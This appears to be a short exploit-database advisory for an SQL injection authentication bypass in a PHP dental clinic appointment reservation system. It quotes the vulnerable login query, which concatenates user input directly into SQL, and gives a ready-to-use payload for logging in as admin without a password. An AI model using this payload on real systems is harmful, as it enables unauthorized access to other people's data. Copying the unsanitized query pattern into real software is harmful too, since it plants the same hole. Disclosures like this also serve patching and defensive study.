Exploits / Vulnerability Discovered : 2021-05-13 |
Type : webapps |
Platform : php
This exploit / vulnerability Dental clinic appointment reservation system 1.0 authentication bypass (sqli) is for educational purposes only and if it is used you will do on your own risk!
# Description:
# Attacker can bypass admin login page due to unsanitized user input and access internal contents
# vulnerable code in /admin/index.php, line 34:
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
# payload: admin' or '1' = '1 -- -
# Proof of concept:
http://localhost/admin/index.php